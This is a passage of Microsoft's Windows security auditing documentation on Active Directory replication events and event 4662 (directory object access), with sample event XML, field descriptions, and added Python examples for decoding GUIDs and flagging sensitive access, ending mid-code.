    <Data Name="DestinationDRA">CN=NTDS Settings,CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=contoso,DC=local</Data>
    <Data Name="SourceDRA">CN=NTDS Settings,CN=WIN2012R2,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=contoso,DC=local</Data>
    <Data Name="SourceAddr">ddec0cff-6ceb-4a59-b13f-1724c38a0970._msdcs.contoso.local</Data>
    <Data Name="NamingContext">DC=ForestDnsZones,DC=contoso,DC=local</Data>
    <Data Name="Options">368</Data>
    <Data Name="StatusCode">0</Data>
  </EventData>
</Event>

Required Server Roles: Active Directory domain controller.
Minimum OS Version: Windows Server 2008.
Event Versions: 0.
Field Descriptions:
Destination DRA [Type = UnicodeString]: destination directory replication agent distinguished name.

Note The Directory Replication Agent (DRA) handles replication between domain controllers. The
Directory Replication Agent uses the connection objects in the topology map to find out which partners are
relevant when replicating changes to directory partitions. The DRA sends a replication request to the partners
of a domain controller when the domain controller needs to update its copy of Active Directory.

Source DRA [Type = UnicodeString]: source directory replication agent distinguished name.

Note The LDAP API references an LDAP object by its distinguished name (DN). A DN is a sequence of
relative distinguished names (RDN) connected by commas.
An RDN is an attribute with an associated value in the form attribute=value. These are examples of RDN
attributes:
• DC - domainComponent
• CN - commonName
• OU - organizationalUnitName
• O - organizationName

Source Address [Type = UnicodeString]: DNS record of the server from which information or an update
was received.
Naming Context [Type = UnicodeString]: naming context to replicate.

Note The Active Directory directory tree is partitioned to allow sections to be distributed (replicated) to
domain controllers in different domains within the forest. Each domain controller stores a copy of a specific
part of the directory tree, called a Naming Context, also known as a Directory Partition. A Naming Context is
replicated as a unit to other domain controllers in the forest that contain a replica of the same subtree.

Options [Type = UInt32]: decimal value of DRS Options.

Status Code [Type = UInt32]: if there are no issues or errors, the status code will be 0. If an error happened,
you will receive a Failure event and the Status Code will not be equal to “0”. You can check the error code
meaning here: https://msdn.microsoft.com/library/windows/desktop/ms681381(v=vs.85).aspx

Security Monitoring Recommendations

For 4928(S, F): An Active Directory replica source naming context was established.
Monitor the Source Address field, because the source of new replication (the new DRA) must be authorized for
this action. If you find any unauthorized DRA, you should trigger an alert.
This event is typically used for Active Directory replication troubleshooting.
4929(S, F): An Active Directory replica source naming context was removed.
4/5/2019 • 2 minutes to read

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Detailed Directory Service Replication
Event Description:
This event generates every time an Active Directory replica source naming context is removed.
Failure event generates if an error occurs (Status Code != 0).

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
    <EventID>4929</EventID>
    <Version>0</Version>
    <Level>0</Level>
    <Task>14083</Task>
    <Opcode>0</Opcode>
    <Keywords>0x8020000000000000</Keywords>
    <TimeCreated SystemTime="2015-08-27T18:54:50.446211200Z" />
    <EventRecordID>227013</EventRecordID>
    <Correlation />
    <Execution ProcessID="524" ThreadID="2636" />
    <Channel>Security</Channel>
    <Computer>DC01.contoso.local</Computer>
    <Security />
  </System>
  <EventData>
    <Data Name="DestinationDRA">CN=NTDS Settings,CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=contoso,DC=local</Data>
    <Data Name="SourceDRA">-</Data>
    <Data Name="SourceAddr">2d361dd6-fc22-4d9d-b876-ec582b836458._msdcs.contoso.local</Data>
    <Data Name="NamingContext">DC=contoso,DC=local</Data>
    <Data Name="Options">16640</Data>
    <Data Name="StatusCode">0</Data>
  </EventData>
</Event>

Required Server Roles: Active Directory domain controller.
Minimum OS Version: Windows Server 2008.
Event Versions: 0.
Field Descriptions:
Destination DRA [Type = UnicodeString]: destination directory replication agent distinguished name.

Note The Directory Replication Agent (DRA) handles replication between domain controllers. The
Directory Replication Agent uses the connection objects in the topology map to find out which partners are
relevant when replicating changes to directory partitions. The DRA sends a replication request to the partners
of a domain controller when the domain controller needs to update its copy of Active Directory.

Source DRA [Type = UnicodeString]: source directory replication agent distinguished name.

Note The LDAP API references an LDAP object by its distinguished name (DN). A DN is a sequence of
relative distinguished names (RDN) connected by commas.
An RDN is an attribute with an associated value in the form attribute=value. These are examples of RDN
attributes:
• DC - domainComponent
• CN - commonName
• OU - organizationalUnitName
• O - organizationName

Source Address [Type = UnicodeString]: DNS record of the server from which the “remove” request was
received.
Naming Context [Type = UnicodeString]: naming context which was removed.

Note The Active Directory directory tree is partitioned to allow sections to be distributed (replicated) to
domain controllers in different domains within the forest. Each domain controller stores a copy of a specific
part of the directory tree, called a Naming Context, also known as a Directory Partition. A Naming Context is
replicated as a unit to other domain controllers in the forest that contain a replica of the same subtree.

Options [Type = UInt32]: decimal value of DRS Options.

Status Code [Type = UInt32]: if there are no issues or errors, the status code will be 0. If an error happened,
you will receive a Failure event and the Status Code will not be equal to “0”. You can check the error code
meaning here: https://msdn.microsoft.com/library/windows/desktop/ms681381(v=vs.85).aspx

Security Monitoring Recommendations

For 4929(S, F): An Active Directory replica source naming context was removed.
Monitor the Source Address field, because the source of the request must be authorized for this action. If
you find any unauthorized DRA, you should trigger an alert.
This event is typically used for Active Directory replication troubleshooting.
4930(S, F): An Active Directory replica source naming context was modified.
4/5/2019 • 2 minutes to read

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Detailed Directory Service Replication
Event Description:
This event generates every time an Active Directory replica source naming context is modified.
Failure event generates if an error occurs (Status Code != 0).
It is not possible to tell from this event what exactly was modified.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
    <EventID>4930</EventID>
    <Version>0</Version>
    <Level>0</Level>
    <Task>14083</Task>
    <Opcode>0</Opcode>
    <Keywords>0x8020000000000000</Keywords>
    <TimeCreated SystemTime="2015-08-27T18:56:51.474057400Z" />
    <EventRecordID>1564</EventRecordID>
    <Correlation />
    <Execution ProcessID="504" ThreadID="1280" />
    <Channel>Security</Channel>
    <Computer>Win2012r2.corp.contoso.local</Computer>
    <Security />
  </System>
  <EventData>
    <Data Name="DestinationDRA">CN=NTDS Settings,CN=WIN2012R2,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=contoso,DC=local</Data>
    <Data Name="SourceDRA">-</Data>
    <Data Name="SourceAddr">edf0bef9-1f73-4df3-8991-f6ec2d4ef3ae</Data>
    <Data Name="NamingContext">CN=Schema,CN=Configuration,DC=contoso,DC=local</Data>
    <Data Name="Options">0</Data>
    <Data Name="StatusCode">0</Data>
  </EventData>
</Event>

Required Server Roles: Active Directory domain controller.
Minimum OS Version: Windows Server 2008.
Event Versions: 0.
Field Descriptions:
Destination DRA [Type = UnicodeString]: destination directory replication agent distinguished name.

Note The Directory Replication Agent (DRA) handles replication between domain controllers. The
Directory Replication Agent uses the connection objects in the topology map to find out which partners are
relevant when replicating changes to directory partitions. The DRA sends a replication request to the partners
of a domain controller when the domain controller needs to update its copy of Active Directory.

Source DRA [Type = UnicodeString]: source directory replication agent distinguished name. Typically equals
“-” for this event.

Note The LDAP API references an LDAP object by its distinguished name (DN). A DN is a sequence of
relative distinguished names (RDN) connected by commas.
An RDN is an attribute with an associated value in the form attribute=value. These are examples of RDN
attributes:
• DC - domainComponent
• CN - commonName
• OU - organizationalUnitName
• O - organizationName

Source Address [Type = UnicodeString]: DNS record of computer from which the modification request
was received.
Naming Context [Type = UnicodeString]: naming context which was modified.

Note The Active Directory directory tree is partitioned to allow sections to be distributed (replicated) to
domain controllers in different domains within the forest. Each domain controller stores a copy of a specific
part of the directory tree, called a Naming Context, also known as a Directory Partition. A Naming Context is
replicated as a unit to other domain controllers in the forest that contain a replica of the same subtree.

Options [Type = UInt32]: decimal value of DRS Options.

Status Code [Type = UInt32]: if there are no issues or errors, the status code will be 0. If an error happened,
you will receive a Failure event and the Status Code will not be equal to “0”. You can check the error code
meaning here: https://msdn.microsoft.com/library/windows/desktop/ms681381(v=vs.85).aspx

Security Monitoring Recommendations

For 4930(S, F): An Active Directory replica source naming context was modified.
Monitor the Source Address field, because the source of the request must be authorized for this action. If
you find any unauthorized DRA, you should trigger an alert.
This event is typically used for Active Directory replication troubleshooting.
4931(S, F): An Active Directory replica destination
naming context was modified.
4/5/2019 • 2 minutes to read • Edit Online

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Detailed Directory Service Replication
Event Description:
This event generates every time an Active Directory replica destination naming context was modified.
Failure event generates if an error occurs (Status Code != 0).
It is not possible to understand what exactly was modified from this event.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>4931</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>14083</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-08-27T19:02:41.563619400Z" />
<EventRecordID>227058</EventRecordID>
<Correlation />
<Execution ProcessID="524" ThreadID="2936" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
- <EventData>
<Data Name="DestinationDRA">ddec0cff-6ceb-4a59-b13f-1724c38a0970._msdcs.contoso.local</Data>
<Data Name="SourceDRA">CN=NTDS Settings,CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=contoso,DC=local</Data>
<Data Name="SourceAddr">-</Data>
<Data Name="NamingContext">DC=ForestDnsZones,DC=contoso,DC=local</Data>
<Data Name="Options">23</Data>
<Data Name="StatusCode">0</Data>
</EventData>
</Event>

Required Server Roles: Active Directory domain controller.


Minimum OS Version: Windows Server 2008.
Event Versions: 0.
Field Descriptions:
Destination DRA [Type = UnicodeString]: destination directory replication agent distinguished name.

Note The Directory Replication Agent (DRA) handles replication between domain controllers. The Directory Replication Agent uses the connection objects in the topology map to find out which partners are relevant when replicating changes to directory partitions. The DRA sends a replication request to the partners of a domain controller when the domain controller needs to update its copy of Active Directory.

Source DRA [Type = UnicodeString]: source directory replication agent distinguished name.

Note The LDAP API references an LDAP object by its distinguished name (DN). A DN is a sequence of relative distinguished names (RDN) connected by commas.
An RDN is an attribute with an associated value in the form attribute=value. These are examples of RDN attributes:
• DC - domainComponent
• CN - commonName
• OU - organizationalUnitName
• O - organizationName

Destination Address [Type = UnicodeString]: DNS record of the computer to which the modification request was sent.
Naming Context [Type = UnicodeString]: naming context which was modified.

Note The Active Directory directory tree is partitioned to allow sections to be distributed (replicated) to domain controllers in different domains within the forest. Each domain controller stores a copy of a specific part of the directory tree, called a Naming Context, also known as a Directory Partition. A Naming Context is replicated as a unit to other domain controllers in the forest that contain a replica of the same subtree.

Options [Type = UInt32]: decimal value of DRS Options.


Status Code [Type = UInt32]: if there are no issues or errors, the status code is 0. If an error happened, a Failure event is generated and the Status Code is not equal to “0”. You can check the error code meaning here: https://msdn.microsoft.com/library/windows/desktop/ms681381(v=vs.85).aspx

Security Monitoring Recommendations


For 4931(S, F): An Active Directory replica destination naming context was modified.
This event is typically used for Active Directory replication troubleshooting.
4934(S): Attributes of an Active Directory object were replicated.
4/5/2019 • 2 minutes to read

Applies to
Windows 10
Windows Server 2016
This event generates when attributes of an Active Directory object were replicated.
There is no example of this event in this document.
Subcategory: Audit Detailed Directory Service Replication
Event Schema:
Attributes of an Active Directory object were replicated.
Session ID:%1
Object:%2
Attribute:%3
Type of change:%4
New Value:%5
USN:%6
Status Code:%7
Required Server Roles: Active Directory domain controller.
Minimum OS Version: Windows Server 2008.
Event Versions: 0.

Security Monitoring Recommendations


This event is typically used for Active Directory replication troubleshooting.
4935(F): Replication failure begins.
4/5/2019 • 2 minutes to read

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Detailed Directory Service Replication
Event Description:
This event generates when Active Directory replication failure begins.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:

- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>4935</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>14083</Task>
<Opcode>0</Opcode>
<Keywords>0x8010000000000000</Keywords>
<TimeCreated SystemTime="2015-08-27T18:54:48.758149800Z" />
<EventRecordID>1552</EventRecordID>
<Correlation />
<Execution ProcessID="504" ThreadID="524" />
<Channel>Security</Channel>
<Computer>Win2012r2.contoso.local</Computer>
<Security />
</System>
- <EventData>
<Data Name="ReplicationEvent">1</Data>
<Data Name="AuditStatusCode">8419</Data>
</EventData>
</Event>

Required Server Roles: Active Directory domain controller.


Minimum OS Version: Windows Server 2008.
Event Versions: 0.
Field Descriptions:
Replication Event [Type = UInt32]: there is no detailed information about this field in this document.
Audit Status Code [Type = UInt32]: there is no detailed information about this field in this document.

Security Monitoring Recommendations


For 4935(F): Replication failure begins.
This event is typically used for Active Directory replication troubleshooting.
4936(S): Replication failure ends.
4/5/2019 • 2 minutes to read

Applies to
Windows 10
Windows Server 2016
This event generates when Active Directory replication failure ends.
There is no example of this event in this document.
Subcategory: Audit Detailed Directory Service Replication
Event Schema:
Replication failure ends.
Replication Event:%1
Audit Status Code:%2
Replication Status Code:%3
Required Server Roles: Active Directory domain controller.
Minimum OS Version: Windows Server 2008.
Event Versions: 0.

Security Monitoring Recommendations


This event is typically used for Active Directory replication troubleshooting.
4937(S): A lingering object was removed from a replica.
4/5/2019 • 2 minutes to read

Applies to
Windows 10
Windows Server 2016
This event generates when a lingering object was removed from a replica.
There is no example of this event in this document.
Subcategory: Audit Detailed Directory Service Replication
Event Schema:
A lingering object was removed from a replica.
Destination DRA:%1
Source DRA:%2
Object:%3
Options:%4
Status Code:%5
Required Server Roles: Active Directory domain controller.
Minimum OS Version: Windows Server 2008.
Event Versions: 0.

Security Monitoring Recommendations


There is no recommendation for this event in this document.
Audit Directory Service Access
4/5/2019 • 2 minutes to read

Applies to
Windows 10
Windows Server 2016
Audit Directory Service Access determines whether the operating system generates audit events when an Active Directory Domain Services (AD DS) object is accessed.
Event volume: High on servers running AD DS role services.
This subcategory allows you to audit when an Active Directory Domain Services (AD DS) object is accessed. It also generates Failure events if access was not granted.

Recommended settings by computer type (General Success / General Failure / Stronger Success / Stronger Failure / Comments):

Computer Type: Domain Controller
General Success: No
General Failure: Yes
Stronger Success: No
Stronger Failure: Yes
Comments: It is better to track changes to Active Directory objects through the Audit Directory Service Changes subcategory. However, Audit Directory Service Changes doesn’t give you information about failed access attempts, so we recommend Failure auditing in this subcategory to track failed access attempts to Active Directory objects.
For recommendations for using and analyzing the collected information, see the Security Monitoring Recommendations sections. Also, develop an Active Directory auditing policy (SACL design for specific classes, operation types which need to be monitored for specific Organizational Units, and so on) so you can audit only the access attempts that are made to specific important objects.

Computer Type: Member Server
General Success: No
General Failure: No
Stronger Success: No
Stronger Failure: No
Comments: This subcategory makes sense only on domain controllers.

Computer Type: Workstation
General Success: No
General Failure: No
Stronger Success: No
Stronger Failure: No
Comments: This subcategory makes sense only on domain controllers.

Events List:
4662(S, F): An operation was performed on an object.
4661(S, F): A handle to an object was requested.
4662(S, F): An operation was performed on an object.
4/5/2019 • 7 minutes to read

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Directory Service Access
Event Description:
This event generates every time an operation was performed on an Active Directory object.
This event generates only if an appropriate SACL was set for the Active Directory object and the performed operation matches this SACL.
If the operation failed, then a Failure event will be generated.
You will get one 4662 for each operation type which was performed.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>4662</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>14080</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-08-28T01:58:36.894922400Z" />
<EventRecordID>407230</EventRecordID>
<Correlation />
<Execution ProcessID="520" ThreadID="600" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
- <EventData>
<Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
<Data Name="SubjectUserName">dadmin</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0x35867</Data>
<Data Name="ObjectServer">DS</Data>
<Data Name="ObjectType">%{bf967a86-0de6-11d0-a285-00aa003049e2}</Data>
<Data Name="ObjectName">%{38b3d2e6-9948-4dc1-ae90-1605d5eab9a2}</Data>
<Data Name="OperationType">Object Access</Data>
<Data Name="HandleId">0x0</Data>
<Data Name="AccessList">%%1537</Data>
<Data Name="AccessMask">0x10000</Data>
<Data Name="Properties">%%1537 {bf967a86-0de6-11d0-a285-00aa003049e2}</Data>
<Data Name="AdditionalInfo">-</Data>
<Data Name="AdditionalInfo2" />
</EventData>
</Event>

Required Server Roles: Active Directory domain controller.


Minimum OS Version: Windows Server 2008.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that requested the operation. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user from the database and places it in the access token for that user. The system uses the SID in the access token to identify the user in all subsequent interactions with Windows security. When a SID has been used as the unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that requested the operation.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Object:
Object Server [Type = UnicodeString]: has “DS” value for this event.
Object Type [Type = UnicodeString]: type or class of the object that was accessed. Some of the common
Active Directory object types and classes are:
container – for containers.
user – for users.
group – for groups.
domainDNS – for domain object.
groupPolicyContainer – for group policy objects.
For all possible values of Object Type open Active Directory Schema snap-in (see how to enable
this snap-in: https://technet.microsoft.com/library/Cc755885(v=WS.10).aspx) and navigate to Active
Directory Schema\Classes. Or use this document:
https://msdn.microsoft.com/library/cc221630.aspx
Object Name [Type = UnicodeString]: distinguished name of the object that was accessed.

Note The LDAP API references an LDAP object by its distinguished name (DN). A DN is a sequence of relative distinguished names (RDN) connected by commas.
An RDN is an attribute with an associated value in the form attribute=value. These are examples of RDN attributes:
• DC - domainComponent
• CN - commonName
• OU - organizationalUnitName
• O - organizationName

Handle ID [Type = Pointer]: hexadecimal value of a handle to Object Name. This field can help you correlate
this event with other events that might contain the same Handle ID, for example, “4661: A handle to an object
was requested.” This parameter might not be captured in the event, and in that case appears as “0x0”.
Operation:
Operation Type [Type = UnicodeString]: the type of operation which was performed on an object.
Typically has “Object Access” value for this event.
Accesses [Type = UnicodeString]: the type of access used for the operation. See “Table 9. Active Directory
Access Codes and Rights.” for more information.
Access Mask [Type = HexInt32]: hexadecimal mask for the type of access used for the operation. See
“Table 9. Active Directory Access Codes and Rights.” for more information.

Access Mask / Access Name: Description

0x1 Create Child: The right to create child objects of the object.
0x2 Delete Child: The right to delete child objects of the object.
0x4 List Contents: The right to list child objects of this object.
0x8 SELF: The right to perform an operation controlled by a validated write access right.
0x10 Read Property: The right to read properties of the object.
0x20 Write Property: The right to write properties of the object.
0x40 Delete Tree: Delete all children of this object, regardless of the permissions of the children. It indicates that the “Use Delete Subtree server control” check box was checked during deletion. This operation means that all objects within the subtree, including all delete-protected objects, will be deleted.
0x80 List Object: The right to list a particular object.
0x100 Control Access: Access allowed only after extended rights checks supported by the object are performed. The right to perform an operation controlled by an extended access right.
0x10000 DELETE: The right to delete the object. DELETE is also generated when the object was moved.
0x20000 READ_CONTROL: The right to read data from the security descriptor of the object, not including the data in the SACL.
0x40000 WRITE_DAC: The right to modify the discretionary access-control list (DACL) in the object security descriptor.
0x80000 WRITE_OWNER: The right to assume ownership of the object. The user must be an object trustee. The user cannot transfer the ownership to other users.
0x100000 SYNCHRONIZE: The right to use the object for synchronization. This enables a thread to wait until the object is in the signaled state.
0x1000000 ADS_RIGHT_ACCESS_SYSTEM_SECURITY: The right to get or set the SACL in the object security descriptor.
0x80000000 ADS_RIGHT_GENERIC_READ: The right to read permissions on this object, read all the properties on this object, list this object name when the parent container is listed, and list the contents of this object if it is a container.
0x40000000 ADS_RIGHT_GENERIC_WRITE: The right to read permissions on this object, write all the properties on this object, and perform all validated writes to this object.
0x20000000 ADS_RIGHT_GENERIC_EXECUTE: The right to read permissions on, and list the contents of, a container object.
0x10000000 ADS_RIGHT_GENERIC_ALL: The right to create or delete child objects, delete a subtree, read and write properties, examine child objects and the object itself, add and remove the object from the directory, and read or write with an extended right.

Table 9. Active Directory Access Codes and Rights.

Properties [Type = UnicodeString]: first part is the type of access that was used. Typically has the same
value as Accesses field.
Second part is a tree of GUID values of Active Directory classes or property sets, for which operation was
performed.

Note GUID is an acronym for 'Globally Unique Identifier'. It is a 128-bit integer number used to identify
resources, activities or instances.

To translate this GUID, use the following procedure:
Perform the following LDAP search using the LDP.exe tool:
Base DN: CN=Schema,CN=Configuration,DC=XXX,DC=XXX
Filter: (&(objectClass=*)(schemaIDGUID=GUID))
Perform the following operations with the GUID before using it in a search request:
We have this GUID to search for: bf967a86-0de6-11d0-a285-00aa003049e2
Take the first 3 sections: bf967a86-0de6-11d0.
For each of these 3 sections, change (invert) the order of bytes, like this: 867a96bf-e60d-d011
Add the last 2 sections without transformation: 867a96bf-e60d-d011-a285-00aa003049e2
Delete the hyphens: 867a96bfe60dd011a28500aa003049e2
Divide bytes with backslashes: \86\7a\96\bf\e6\0d\d0\11\a2\85\00\aa\00\30\49\e2
Filter example: (&(objectClass=*)(schemaIDGUID=\86\7a\96\bf\e6\0d\d0\11\a2\85\00\aa\00\30\49\e2))
Scope: Subtree
Attributes: schemaIDGUID

Sometimes the GUID refers to a pre-defined Active Directory Property Set; you can find the GUID (Rights-GUID field), “property set name” and details here: https://msdn.microsoft.com/library/ms683990(v=vs.85).aspx.
Here is an example of decoding the Properties field:

Properties (GUID): Translation
{bf967a86-0de6-11d0-a285-00aa003049e2}: Computer
{91e647de-d96f-4b70-9557-d63ff4f3ccd8}: Private-Information property set
{6617e4ac-a2f1-43ab-b60c-11fbd1facf05}: ms-PKI-RoamingTimeStamp
{b3f93023-9239-4f7c-b99c-6745d87adbc2}: ms-PKI-DPAPIMasterKeys
{b8dfa744-31dc-4ef1-ac7c-84baf7ef9da7}: ms-PKI-AccountCredentials
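The GUID-to-filter transformation from the LDP.exe procedure above and the Properties decoding table, as an added Python example that is not part of the original page. The GUID-to-name lookup is constructed from the translations listed above; the %%1537 access token and the GUID come from this page's sample 4662 event.

```python
import re
import uuid

# Lookup constructed from the decoding table above. A real deployment would
# populate it from schemaIDGUID (schema classes/attributes) and rightsGuid
# (property sets / extended rights) instead of a hard-coded dict.
KNOWN_GUIDS = {
    "bf967a86-0de6-11d0-a285-00aa003049e2": "Computer",
    "91e647de-d96f-4b70-9557-d63ff4f3ccd8": "Private-Information property set",
    "6617e4ac-a2f1-43ab-b60c-11fbd1facf05": "ms-PKI-RoamingTimeStamp",
    "b3f93023-9239-4f7c-b99c-6745d87adbc2": "ms-PKI-DPAPIMasterKeys",
    "b8dfa744-31dc-4ef1-ac7c-84baf7ef9da7": "ms-PKI-AccountCredentials",
}

GUID_RE = re.compile(r"[0-9a-fA-F]{8}(?:-[0-9a-fA-F]{4}){3}-[0-9a-fA-F]{12}")


def guid_to_ldap_bytes_manual(guid):
    """The page's manual procedure: byte-swap the first three sections, keep
    the last two, drop the hyphens and prefix every byte with a backslash."""
    parts = guid.lower().split("-")
    if len(parts) != 5:
        raise ValueError("not a GUID: %r" % guid)
    swapped = []
    for section in parts[:3]:
        pairs = [section[i:i + 2] for i in range(0, len(section), 2)]
        swapped.append("".join(reversed(pairs)))
    raw = "".join(swapped + parts[3:])
    return "".join("\\" + raw[i:i + 2] for i in range(0, len(raw), 2))


def guid_to_ldap_bytes(guid):
    """Same result via the uuid module: bytes_le is the little-endian layout
    in which the schemaIDGUID attribute stores the GUID, so no manual
    swapping is needed."""
    return "".join("\\%02x" % b for b in uuid.UUID(guid).bytes_le)


def schema_guid_filter(guid):
    """Build the LDP.exe search filter shown above for a schemaIDGUID lookup."""
    return "(&(objectClass=*)(schemaIDGUID=%s))" % guid_to_ldap_bytes(guid)


def decode_properties(properties):
    """Split a 4662 Properties field into its access-type token (e.g. %%1537)
    and the GUID tree, translating every GUID it knows. Unknown GUIDs are
    flagged rather than silently dropped so the analyst knows to look them up."""
    token_match = re.match(r"\s*(%%\d+)", properties)
    access_token = token_match.group(1) if token_match else None
    guids = [g.lower() for g in GUID_RE.findall(properties)]
    translated = [(g, KNOWN_GUIDS.get(g, "unknown (look up schemaIDGUID/rightsGuid)"))
                  for g in guids]
    return {"access_token": access_token, "guids": translated}


if __name__ == "__main__":
    # Properties value from the 4662 sample event on this page.
    sample = "%%1537 {bf967a86-0de6-11d0-a285-00aa003049e2}"
    print(schema_guid_filter("bf967a86-0de6-11d0-a285-00aa003049e2"))
    print(decode_properties(sample))
```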

Additional Information:
Parameter 1 [Type = UnicodeString]: there is no information about this field in this document.
Parameter 2 [Type = UnicodeString]: there is no information about this field in this document.

Security Monitoring Recommendations


For 4662(S, F ): An operation was performed on an object.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit events.

If you need to monitor operations attempts to specific Active Directory classes, monitor for Object Type
field with specific class name. For example, we recommend that you monitor all operations attempts to
domainDNS class.
If you need to monitor operations attempts to specific Active Directory objects, monitor for Object Name
field with specific object name. For example, we recommend that you monitor all operations attempts to
“CN=AdminSDHolder,CN=System,DC=domain,DC=com” object.
Some access types are more important to monitor, for example:
Write Property
Control Access
DELETE
WRITE_DAC
WRITE_OWNER
You can decide to monitor these (or one of these) access types for specific Active Directory objects.
To do so, monitor for Accesses field with specific access type.
If you need to monitor operations attempts to specific Active Directory properties, monitor for Properties
field with specific property GUID.
Do not forget that Failure attempts are also very important to audit. Decide where you want to monitor
Failure attempts based on previous recommendations.
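The recommendations above (watched classes, watched object names, the sensitive access types from Table 9, and Failure outcomes) applied to 4662 events, as an added Python example that is not part of the original page. It assumes the contoso.local sample domain for the AdminSDHolder DN, uses an all-zero placeholder for an unwatched class GUID, and takes the Audit Success/Failure Keywords values from this page's sample events.

```python
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
AUDIT_FAILURE_KEYWORDS = "0x8010000000000000"  # Keywords value in the 4935(F) sample above
AUDIT_SUCCESS_KEYWORDS = "0x8020000000000000"  # Keywords value in the 4662 sample above

# Access-mask bits from Table 9 for the access types the recommendations single out.
SENSITIVE_ACCESS_BITS = {
    0x20: "Write Property",
    0x100: "Control Access",
    0x10000: "DELETE",
    0x40000: "WRITE_DAC",
    0x80000: "WRITE_OWNER",
}

# Watch lists built from the recommendations. The DN uses the page's sample domain;
# the class GUID is the Computer class from the Properties decoding table above.
WATCHED_OBJECT_NAMES = {"CN=AdminSDHolder,CN=System,DC=contoso,DC=local"}
WATCHED_CLASS_GUIDS = {"bf967a86-0de6-11d0-a285-00aa003049e2": "Computer"}


def parse_event(xml_text):
    """Flatten EventID, the Success/Failure keyword and every EventData field
    of a Security event into one dict."""
    root = ET.fromstring(xml_text)
    fields = {d.get("Name"): (d.text or "").strip()
              for d in root.findall("e:EventData/e:Data", NS)}
    fields["EventID"] = root.findtext("e:System/e:EventID", namespaces=NS)
    keywords = root.findtext("e:System/e:Keywords", namespaces=NS)
    fields["Outcome"] = "Failure" if keywords == AUDIT_FAILURE_KEYWORDS else "Success"
    return fields


def sensitive_rights(access_mask_hex):
    """Decode the Access Mask against Table 9, keeping only the rights the
    recommendations call out; returned in ascending bit order."""
    mask = int(access_mask_hex, 16)
    return [name for bit, name in sorted(SENSITIVE_ACCESS_BITS.items()) if mask & bit]


def evaluate_4662(fields):
    """Return the reasons a 4662 event deserves attention (empty list if none)."""
    if fields.get("EventID") != "4662":
        return []
    reasons = []
    class_guid = fields.get("ObjectType", "").strip("%{}").lower()
    if class_guid in WATCHED_CLASS_GUIDS:
        reasons.append("watched class: " + WATCHED_CLASS_GUIDS[class_guid])
    if fields.get("ObjectName") in WATCHED_OBJECT_NAMES:
        reasons.append("watched object: " + fields["ObjectName"])
    rights = sensitive_rights(fields.get("AccessMask", "0x0"))
    if rights:
        reasons.append("sensitive access: " + ", ".join(rights))
    if fields["Outcome"] == "Failure":
        reasons.append("failed access attempt")
    return reasons


def make_4662(object_type, object_name, access_mask, keywords=AUDIT_SUCCESS_KEYWORDS):
    """Constructed 4662 event in the shape of the page's sample (trimmed to the
    fields the rules read)."""
    return (
        '<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">'
        "<System><EventID>4662</EventID><Keywords>%s</Keywords>"
        "<Channel>Security</Channel></System><EventData>"
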